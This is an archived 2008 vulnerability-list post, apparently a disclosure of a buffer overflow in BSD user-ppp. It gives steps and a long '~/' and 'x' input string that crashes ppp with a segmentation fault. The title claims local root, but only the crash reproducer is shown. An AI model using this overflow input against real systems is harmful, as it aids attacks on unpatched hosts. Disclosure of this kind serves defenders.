*BSD user-ppp local root (when conditions permit)
[email protected] 29 Feb 2008 16:39:03 -0000
| Newsgroups | gmane.comp.security.vulnerabilities |
|---|---|
| Message-ID | <[email protected]> |
/************************************************************************=
***********/=0D
=0D
/*** pppx.conf - Point to Point Protocol (a.k.a. user-ppp) exploit by=
sipher ***/=0D
=0D
/*** 2003 / 12 /23 - PRIVATE CODE =
***/=0D
=0D
/*** Program terminated with signal 11, Segmentation fault. =
***/=0D
=0D
/*** #0 0xbeefdead in ?? () =
***/=0D
=0D
/************************************************************************=
***********/=0D
=0D
=0D
I just tested this on FreeBSD 6.3. This bug was discovered on NetBSD. It =
also works on OpenBSD (unconfirmed on 4.2)=0D
=0D
=0D
Steps to reproduce:=0D
=0D
=0D
1. Run ppp=0D
=0D
2. type the following (or atleat some variation of)=0D
=0D
~/~/~/~/~/~/~/~/~/~/xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx=
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx=
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx=
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx=
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx=
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx=
xxx=0D
=0D
=0D
This will produce a segmentation violation (Core dumped).=0D
=0D
=0D
Discovered by: sipher=0D
=0D
=0D
Shouts: princess^pookie,spithash,burnout,#codemasters,#hackers@dalnet